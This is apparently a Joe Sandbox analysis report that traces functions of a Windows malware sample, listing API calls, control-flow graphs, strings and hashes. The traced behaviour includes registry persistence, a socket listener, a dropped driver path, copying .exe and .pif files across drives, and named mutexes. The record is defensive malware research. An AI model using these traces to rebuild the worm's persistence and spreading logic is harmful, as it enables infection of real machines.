                                    • API ID: lstrlen$CloseCreateEnumNameOpenUserValuelstrcatlstrcpy
                                    • String ID: %c%d_%d$Software\
                                    • API String ID: 1562553360-4194366771
                                    • Opcode ID: bcd770838c2c7f91c2ab754fa2e24f8dc3c066885f9c33d90ebdccad5e3f907d
                                    • Instruction ID: ac3b0274ef53682b4331df3f9d13085eb48d1a99de036aeaff701d759ae75872
                                    • Opcode Fuzzy Hash: bcd770838c2c7f91c2ab754fa2e24f8dc3c066885f9c33d90ebdccad5e3f907d
                                    • Instruction Fuzzy Hash: B7E13770940228EBDB24CF55DC98BE9B7B5BB58300F9182DAD50AA7250DB749FC9CF90
                                    Function 00450D00 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 370commemorythreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32 ref: 00450D29
                                    • OleInitialize.OLE32(00000000), ref: 00450D65
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00450D83
                                    • SetCurrentDirectoryA.KERNEL32(04965C00,?), ref: 00450DDD
                                    • LoadCursorA.USER32(00000000,00007F00), ref: 00450E38
                                    • GetStockObject.GDI32(00000005), ref: 00450E59
                                    • GetCurrentThreadId.KERNEL32 ref: 00450E81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Current$CursorDirectoryFileHeapInitializeLoadModuleNameObjectProcessStockThread
                                    • String ID: DM$_EL_HideOwner$jB
                                    • API String ID: 3783217854-3818869847
                                    • Opcode ID: 446e3f6c5886f9dbfe92c663de1827519eb4d7e6305f427b1d3ef0b3f55e38c9
                                    • Instruction ID: 120eafc8109afcb3ae4fd507eadf9738e8a24ef231c213c608d1767f5ccd2d85
                                    • Opcode Fuzzy Hash: 446e3f6c5886f9dbfe92c663de1827519eb4d7e6305f427b1d3ef0b3f55e38c9
                                    • Instruction Fuzzy Hash: 77E1F271A002059BCB64EF55DC81FEEB7B4FF44309F14406EE905A7392EB786949CBA8
                                    Function 02423911 Relevance: 15.1, APIs: 10, Instructions: 122networkthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • htons.WS2_32(00001326), ref: 024239D3
                                    • socket.WS2_32(00000002,00000002,00000000), ref: 024239F0
                                    • setsockopt.WS2_32(?,0000FFFF,00001002,00100000,00000004), ref: 02423A2E
                                    • bind.WS2_32(?,00000002,00000010), ref: 02423A44
                                    • closesocket.WS2_32(?), ref: 02423B28
                                    • RtlExitUserThread.NTDLL(00000000), ref: 02423B30
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitThreadUserbindclosesockethtonssetsockoptsocket
                                    • String ID:
                                    • API String ID: 3895830221-0
                                    • Opcode ID: ce16872d7a8a14354c753c9a93369630368d01cbdcbc59d19464ba79b4328b99
                                    • Instruction ID: a58f9413bfa9e10fcbe5316a379422e07326aa690d81b704e83f624340eea0b7
                                    • Opcode Fuzzy Hash: ce16872d7a8a14354c753c9a93369630368d01cbdcbc59d19464ba79b4328b99
                                    • Instruction Fuzzy Hash: DC512E74D402A8DBEB35DF55CD49BD9BBB4AF08701F4085DAE289A6280D7F85AC8CF14
                                    Function 004BE74F Relevance: 3.0, APIs: 2, Instructions: 27nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtdllDefWindowProc_A.NTDLL(?,?,?,?,?,?,00415AE0,00000085,00000001,00000000), ref: 004BE776
                                    • CallWindowProcA.USER32(?,?,?,?,?), ref: 004BE78B
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$CallNtdllProcProc_
                                    • String ID:
                                    • API String ID: 1646280189-0
                                    • Opcode ID: 540b9c0104fec27db50130639ed8ee2e22dc42e5b1985e1d4f54ecb7bdd7100c
                                    • Instruction ID: 510b02e34562119cc61bea14c5444192b55423426ae9a35fea421a4cd43fc52c
                                    • Opcode Fuzzy Hash: 540b9c0104fec27db50130639ed8ee2e22dc42e5b1985e1d4f54ecb7bdd7100c
                                    • Instruction Fuzzy Hash: 8EF09236100208FFCF619F95DC44DDABFBAFF58365B148529FA4986520DB32D820AB55
                                    Function 0242E6F0 Relevance: 89.6, APIs: 47, Strings: 4, Instructions: 383registrystringlibraryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 426 242e6f0-242e779 call 2433600 call 242dc56 LoadLibraryA 431 242e7c5-242e7df LoadLibraryA 426->431 432 242e77b-242e7c0 GetProcAddress * 3 426->432 433 242e7e1-242e83f GetProcAddress * 4 431->433 434 242e844-242e866 RegOpenKeyExA 431->434 432->431 433->434 435 242e8a0-242e8c2 RegOpenKeyExA 434->435 436 242e868-242e89a RegSetValueExA RegCloseKey 434->436 437 242e8c4-242e8f6 RegSetValueExA RegCloseKey 435->437 438 242e8fc-242e945 lstrcpy lstrcat RegOpenKeyExA 435->438 436->435 437->438 439 242e9b2-242e9d4 RegOpenKeyExA 438->439 440 242e947-242e9ac GetModuleFileNameA wsprintfA lstrlen RegSetValueExA RegCloseKey 438->440 441 242e9da-242ea62 RegSetValueExA * 3 RegCloseKey 439->441 442 242ea68-242ea96 GetComputerNameA lstrlen 439->442 440->439 441->442 443 242eae6-242eb23 CreateFileMappingA call 2421444 call 2421b0e lstrlen 442->443 444 242ea98-242eadf lstrlen 442->444 449 242eb25 call 24259de 443->449 450 242eb2a-242eb6b 443->450 444->443 449->450 452 242eb79-242eba5 call 24213e8 GetTickCount wsprintfA 450->452 453 242eb6d-242eb77 450->453 454 242eba8-242ebb8 452->454 453->452 453->454 457 242ec82-242ecbb lstrcat GetSystemDirectoryA lstrlen 454->457 458 242ebbe-242ebce 454->458 460 242eccd-242ed34 lstrcat * 2 GetWindowsDirectoryA CharLowerA GlobalAlloc * 2 457->460 461 242ecbd-242ecc7 lstrcat 457->461 458->457 459 242ebd4-242ebe3 458->459 459->457 462 242ebe9-242ec1f 459->462 461->460 463 242ec21-242ec2d 462->463 464 242ec2f 462->464 465 242ec39-242ec79 lstrlen wsprintfA 463->465 464->465 466 242ec7b 465->466 467 242ec7d 465->467 466->457 467->454
                                    APIs
                                      • Part of subcall function 0242DC56: RegOpenKeyExA.KERNEL32(80000001,024A3DA8,00000000,000F003F,?,?), ref: 0242DC9D
                                      • Part of subcall function 0242DC56: RegSetValueExA.KERNELBASE(?,024A3DE4,00000000,00000004,00000002,00000004), ref: 0242DCCB
                                      • Part of subcall function 0242DC56: RegCloseKey.KERNEL32(?), ref: 0242DCD8
                                      • Part of subcall function 0242DC56: lstrcpy.KERNEL32(00000000,024A3EAC), ref: 0242DD33
                                      • Part of subcall function 0242DC56: lstrcat.KERNEL32(00000000,024A3EA4), ref: 0242DD46
                                    • LoadLibraryA.KERNEL32(024A3AAC), ref: 0242E766
                                    • GetProcAddress.KERNEL32(00000000,024A40E0), ref: 0242E789
                                    • GetProcAddress.KERNEL32(00000000,024A40F4), ref: 0242E7A1
                                    • GetProcAddress.KERNEL32(00000000,024A4104), ref: 0242E7BA
                                    • LoadLibraryA.KERNEL32(024A41E8), ref: 0242E7CC
                                    • GetProcAddress.KERNEL32(00000000,024A422C), ref: 0242E7EF
                                    • GetProcAddress.KERNEL32(00000000,024A4204), ref: 0242E808
                                    • GetProcAddress.KERNEL32(00000000,024A4218), ref: 0242E820
                                    • GetProcAddress.KERNEL32(00000000,024A41F4), ref: 0242E839
                                    • RegOpenKeyExA.KERNEL32(80000001,024A3B2C,00000000,000F003F,00000000), ref: 0242E85E
                                    • RegSetValueExA.KERNEL32(00000000,024A3B18,00000000,00000004,00000000,00000004), ref: 0242E88D
                                    • RegCloseKey.KERNEL32(00000000), ref: 0242E89A
                                    • RegOpenKeyExA.KERNEL32(80000002,024A3C44,00000000,000F003F,00000000), ref: 0242E8BA
                                    • RegSetValueExA.KERNEL32(00000000,024A3C80,00000000,00000004,00000000,00000004), ref: 0242E8E9
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0242E8F6
                                    • lstrcpy.KERNEL32(00000000,024A3CE0), ref: 0242E90A
                                    • lstrcat.KERNEL32(00000000,024A3D88), ref: 0242E91D
                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,000F003F,00000000), ref: 0242E93D
                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000200), ref: 0242E955
                                    • wsprintfA.USER32 ref: 0242E96F
                                    • lstrlen.KERNEL32(?), ref: 0242E97F
                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 0242E99F
                                    • RegCloseKey.ADVAPI32(?), ref: 0242E9AC
                                    • RegOpenKeyExA.KERNEL32(80000002,024A3CE0,00000000,000F003F,00000000), ref: 0242E9CC
                                    • RegSetValueExA.KERNELBASE(00000000,024A40A0,00000000,00000004,00000000,00000004), ref: 0242E9FF
                                    • RegSetValueExA.KERNELBASE(00000000,024A40B0,00000000,00000004,00000000,00000004), ref: 0242EA2A
                                    • RegSetValueExA.KERNEL32(00000000,024A40C8,00000000,00000004,00000001,00000004), ref: 0242EA55
                                    • RegCloseKey.KERNEL32(00000000), ref: 0242EA62
                                    • GetComputerNameA.KERNEL32(00000000,00000080), ref: 0242EA80
                                    • lstrlen.KERNEL32(00000000), ref: 0242EA8D
                                    • lstrlen.KERNEL32(00000000), ref: 0242EAAB
                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,024A3CC8), ref: 0242EAF9
                                    • lstrlen.KERNEL32(53263431135), ref: 0242EB1B
                                    • GetTickCount.KERNEL32 ref: 0242EB8C
                                    • wsprintfA.USER32 ref: 0242EB9F
                                    • lstrlen.KERNEL32(?,024A572C,0000006E), ref: 0242EC4C
                                    • wsprintfA.USER32 ref: 0242EC5A
                                    • lstrcat.KERNEL32(?,024A3BC4), ref: 0242EC90
                                    • GetSystemDirectoryA.KERNEL32(C:\Windows\system32\drivers\llkhhn.sys,00000080), ref: 0242ECA0
                                    • lstrlen.KERNEL32(C:\Windows\system32\drivers\llkhhn.sys), ref: 0242ECAB
                                    • lstrcat.KERNEL32(C:\Windows\system32\drivers\llkhhn.sys,024A5730), ref: 0242ECC7
                                    • lstrcat.KERNEL32(C:\Windows\system32\drivers\llkhhn.sys,024A3BE0), ref: 0242ECD9
                                    • lstrcat.KERNEL32(C:\Windows\system32\drivers\llkhhn.sys,?), ref: 0242ECEB
                                    • GetWindowsDirectoryA.KERNEL32(c:\windows,00000104), ref: 0242ECFB
                                    • CharLowerA.USER32(c:\windows), ref: 0242ED06
                                    • GlobalAlloc.KERNEL32(00000040,00021000), ref: 0242ED13
                                    • GlobalAlloc.KERNEL32(00000040,00021000), ref: 0242ED25
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProcValue$lstrcatlstrlen$CloseOpen$wsprintf$AllocDirectoryFileGlobalLibraryLoadNamelstrcpy$CharComputerCountCreateLowerMappingModuleSystemTickWindows
                                    • String ID: 53263431135$C:\Windows\system32\drivers\llkhhn.sys$c:\windows$n
                                    • API String ID: 3069067183-4190467421
                                    • Opcode ID: 9b103a5227ca4b383f10f706d186db478b53b198ad0e21a960399f893c2ef378
                                    • Instruction ID: 06a9eb5e986ea89b4d6dee09d36efdc46e55e9d01b0ca9d19534416ab7fb022d
                                    • Opcode Fuzzy Hash: 9b103a5227ca4b383f10f706d186db478b53b198ad0e21a960399f893c2ef378
                                    • Instruction Fuzzy Hash: D2F192B5E802149FEB19CFA4DC9DFAA7B79BB48702F004999E30DA7280D7705A94CF54
                                    Function 0242DD99 Relevance: 81.0, APIs: 42, Strings: 4, Instructions: 450sleepfiletimeCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 468 242dd99-242deeb call 2433600 call 24213e8 Sleep call 2425be5 CreateFileA 475 242df1a-242df34 call 2429652 468->475 476 242deed-242df14 WriteFile CloseHandle 468->476 479 242df43-242df4d 475->479 480 242df36-242df41 Sleep 475->480 476->475 481 242e4d3-242e504 RtlExitUserThread 479->481 482 242df53-242df5d 479->482 480->475 482->481 484 242df63-242df6f 482->484 484->481 485 242df75-242df82 484->485 485->481 486 242df88-242df8f 485->486 486->481 487 242df95-242dfdd call 242dc56 Sleep GetLogicalDrives 486->487 491 242e4c3-242e4ce Sleep 487->491 492 242dfe3-242e001 487->492 491->486 493 242e007-242e045 GetDriveTypeA 492->493 494 242e4be 492->494 493->494 495 242e04b-242e087 lstrcat CreateFileA 493->495 494->491 496 242e2b0-242e2ca GetFileAttributesA 495->496 497 242e08d-242e0c5 GetFileTime FileTimeToSystemTime 495->497 498 242e2f7-242e320 CreateFileA 496->498 499 242e2cc-242e2f4 SetFileAttributesA DeleteFileA call 2425758 496->499 500 242e2a3-242e2aa CloseHandle 497->500 501 242e0cb-242e0e7 497->501 498->494 504 242e326-242e3ac GetSystemTime SystemTimeToFileTime call 2425618 call 24213e8 498->504 499->498 500->496 501->500 503 242e0ed-242e142 call 2421000 ReadFile CharLowerA lstrlen 501->503 510 242e148-242e165 call 24242c7 503->510 511 242e29e 503->511 516 242e3c2-242e3ce lstrcat 504->516 517 242e3ae-242e3c0 lstrcat 504->517 510->511 519 242e16b-242e17e 510->519 511->500 518 242e3d4-242e47c call 242d928 lstrlen WriteFile SetFileTime CloseHandle SetFileAttributesA CreateFileA 516->518 517->518 518->494 524 242e47e-242e4b8 WriteFile CloseHandle SetFileAttributesA 518->524 519->511 523 242e184-242e18d 519->523 525 242e193-242e1a5 523->525 526 242e299 523->526 524->494 527 242e1b0-242e1b3 525->527 528 242e1a7-242e1ad 525->528 526->511 529 242e1b9-242e1c5 527->529 528->527 530 242e1f3-242e21d lstrcpy GetFileAttributesA 529->530 531 242e1c7-242e1d3 529->531 533 242e297 530->533 534 242e21f-242e255 CloseHandle CreateFileA 530->534 531->530 532 242e1d5-242e1e0 531->532 532->530 535 242e1e2-242e1f1 532->535 533->511 534->533 536 242e257-242e291 WriteFile CloseHandle SetFileAttributesA 534->536 535->529 536->533
                                    APIs
                                      • Part of subcall function 024213E8: InterlockedExchange.KERNEL32(024340B8,?), ref: 02421406
                                    • Sleep.KERNEL32 ref: 0242DEAD
                                      • Part of subcall function 02425BE5: GetTempPathA.KERNEL32(00000080,00000000,?), ref: 02425C17
                                      • Part of subcall function 02425BE5: lstrlen.KERNEL32(00000000), ref: 02425C21
                                      • Part of subcall function 02425BE5: lstrcat.KERNEL32(00000000,024A55F4), ref: 02425C3D
                                      • Part of subcall function 02425BE5: lstrcpy.KERNEL32(00000000,00000000), ref: 02425C5A
                                      • Part of subcall function 02425BE5: lstrlen.KERNEL32(00000000,024A41D4,00000000), ref: 02425C88
                                      • Part of subcall function 02425BE5: wsprintfA.USER32 ref: 02425C94
                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 0242DED8
                                    • WriteFile.KERNEL32(000000FF,024A2300,000002E5,?,00000000), ref: 0242DF07
                                    • CloseHandle.KERNEL32(000000FF), ref: 0242DF14
                                    • Sleep.KERNEL32(00004E20), ref: 0242DF3B
                                    • Sleep.KERNEL32(00004E20), ref: 0242DF9F
                                    • GetLogicalDrives.KERNEL32 ref: 0242DFAF
                                    • GetDriveTypeA.KERNEL32(?), ref: 0242E032
                                    • lstrcat.KERNEL32(?,024A4094), ref: 0242E058
                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 0242E074
                                    • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 0242E0A9
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0242E0BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$SleepTime$Createlstrcatlstrlen$CloseDriveDrivesExchangeHandleInterlockedLogicalPathSystemTempTypeWritelstrcpywsprintf
                                    • String ID: .exe$.pif$:$\
                                    • API String ID: 1830140040-4138429844
                                    • Opcode ID: 58c3cd3ba7b98c19600d5f6021d246f545cf2a4f4c53ebc510b8882454eef320
                                    • Instruction ID: 9602412e39b13e6053f46c7a5527f4878a849610d923d0ac22f908fabb6d119d
                                    • Opcode Fuzzy Hash: 58c3cd3ba7b98c19600d5f6021d246f545cf2a4f4c53ebc510b8882454eef320
                                    • Instruction Fuzzy Hash: F312B371D44268DBDB28DB61DC88BEEBB75BF48304F0045D9E209E62C0D774AAA8CF50
                                    Function 02421B0E Relevance: 44.2, APIs: 23, Strings: 2, Instructions: 443stringregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 620 2421b0e-2421bbc call 2433600 623 2421bc3-2421c18 lstrcpy GetUserNameA call 2432ceb lstrlen 620->623 624 2421bbe 620->624 628 2421c1a-2421c27 lstrcat 623->628 629 2421c2d-2421c37 623->629 625 24222a3-24222b3 624->625 628->629 630 2421c48-2421c5b lstrlen 629->630 631 2421ca3-2421cfd lstrlen wsprintfA RegOpenKeyExA 630->631 632 2421c5d-2421ca1 lstrlen 630->632 634 2421d03-2421d1e RegCreateKeyA 631->634 635 2421f5d-2421f7f 631->635 632->630 636 2421d20-2421d27 634->636 637 2421d2c-2421d50 GlobalAlloc call 2427c71 634->637 640 2421f85-2421faf wsprintfA 635->640 641 24220ea-24220f1 635->641 636->625 650 2421d52-2421d5e call 2422399 637->650 651 2421d66-2421d6d 637->651 645 2421fb1-2421fe3 RegQueryValueExA 640->645 646 2421fec-2422025 RegQueryValueExA 640->646 642 24220f7-2422252 call 2432ceb * 5 call 2422399 641->642 643 2422274-242227b 641->643 709 2422254-242226d call 2432ceb 642->709 710 242226f 642->710 648 242228a-2422291 643->648 649 242227d-2422284 RegCloseKey 643->649 652 2421fe5 645->652 653 2421fea 645->653 654 2422027 646->654 655 242202c-242204e 646->655 648->625 649->648 672 2421d63 650->672 660 2421d73-2421d95 651->660 661 2421f3b-2421f42 651->661 653->655 654->655 656 2422054-242205a 655->656 657 24220e5 655->657 662 2422061-242206d 656->662 663 242208b-2422099 656->663 664 242209b-24220a7 656->664 665 24220c8-24220e2 call 242169b 656->665 666 24220a9-24220c6 call 242169b 656->666 667 242206f-242207b 656->667 668 242207d-2422089 656->668 657->641 675 2421d9b-2421de0 wsprintfA 660->675 676 2421ecf-2421f38 RegCloseKey call 2432ceb * 2 660->676 670 2421f51-2421f58 661->670 671 2421f44-2421f4b GlobalFree 661->671 662->657 663->657 664->657 665->657 666->657 667->657 668->657 670->625 671->670 672->651 683 2421e71-2421e78 675->683 684 2421de6-2421dec 675->684 676->661 694 2421e7a-2421e9b RegSetValueExA 683->694 695 2421e9d-2421ec4 lstrlen RegSetValueExA 683->695 684->662 684->663 684->664 684->665 684->666 684->667 684->668 687 2421e23-2421e2d 684->687 688 2421e0b-2421e15 684->688 689 2421e2f-2421e4f call 24216fd lstrcpy 684->689 690 2421df3-2421dfd 684->690 691 2421e51-2421e6b call 24216fd lstrcpy 684->691 692 2421e17-2421e21 684->692 693 2421dff-2421e09 684->693 687->683 688->683 689->683 690->683 691->683 692->683 693->683 700 2421eca 694->700 695->700 709->643 710->643
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,Software\), ref: 02421BD6
                                    • GetUserNameA.ADVAPI32(00000000,?), ref: 02421BEA
                                    • lstrlen.KERNEL32(?), ref: 02421C0F
                                    • lstrcat.KERNEL32(?,024A3CBC), ref: 02421C27
                                    • lstrlen.KERNEL32(?), ref: 02421C4F
                                    • lstrlen.KERNEL32(?), ref: 02421C94
                                    • lstrlen.KERNEL32(?,\%d,?), ref: 02421CC4
                                    • wsprintfA.USER32 ref: 02421CD2
                                    • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 02421CF5
                                    • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 02421D16
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$CreateNameOpenUserlstrcatlstrcpywsprintf
                                    • String ID: Software\$\%d
                                    • API String ID: 939812716-407207646
                                    • Opcode ID: 4a63a79344c5e8ef470ca4c329da0fb65becba66b68374ac003468b5c50876ed
                                    • Instruction ID: de8602b258ce60e3d644ce73715faa3cf0987c75a02a238356d7bb346410192b
                                    • Opcode Fuzzy Hash: 4a63a79344c5e8ef470ca4c329da0fb65becba66b68374ac003468b5c50876ed
                                    • Instruction Fuzzy Hash: 79125E75D04628DFDB24CF55CC84BEAB7B8BF88302F4046DAE50EAA281D7715A88CF51
                                    Function 04310005 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 162librarysleepfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 713 4310005-4310016 714 4310018-431004e 713->714 715 431002b-431003f 713->715 718 4310050-431005c 714->718 719 431005e-4310067 714->719 717 43100c6-4310134 LoadLibraryExA call 4310260 call 4310265 SetErrorMode CreateFileMappingA * 2 715->717 730 4310170-4310190 CreateThread 717->730 731 4310136-431014a MapViewOfFile 717->731 721 4310068-431006d 718->721 719->721 724 4310074-431007f 721->724 725 431006f 721->725 728 4310081 724->728 729 4310086-43100c0 call 4310286 call 4310260 call 4310286 call 4310260 724->729 727 43101ba-43101c1 725->727 733 4310253-431025b 727->733 734 43101c7-43101dd GetModuleFileNameA 727->734 728->727 729->717 737 4310196-431019d 730->737 731->730 735 431014c-4310159 731->735 733->727 738 4310240-4310245 Sleep 734->738 739 43101df-431020a LoadLibraryExA GetProcAddress 734->739 735->730 741 431015b-431016c 735->741 743 43101a9-43101b8 737->743 744 431019f-43101a7 Sleep 737->744 740 431024b-431024d ExitProcess 738->740 739->738 746 431020c-431023e CreateMutexA GetLastError 739->746 741->730 747 431016e 741->747 743->727 743->737 744->737 746->738 746->740 747->730
                                    APIs
                                    • LoadLibraryExA.KERNEL32(KERNEL32.DLL,00000000,00000000), ref: 043100D1
                                    • SetErrorMode.KERNEL32(00008002), ref: 043100F8
                                    • CreateFileMappingA.KERNEL32(-00000001,00000000,00000004,00000000,00008000,hh8geqpHJTkdns0), ref: 04310112
                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,purity_control_90833), ref: 0431012C
                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00015400), ref: 04310142
                                    • CreateThread.KERNEL32(00000000,00000000,00B81737,?,00000000,04310694), ref: 04310190
                                    • Sleep.KERNEL32(000000FF), ref: 043101A1
                                    • GetModuleFileNameA.KERNEL32(00000000,04311778,000001FE), ref: 043101D5
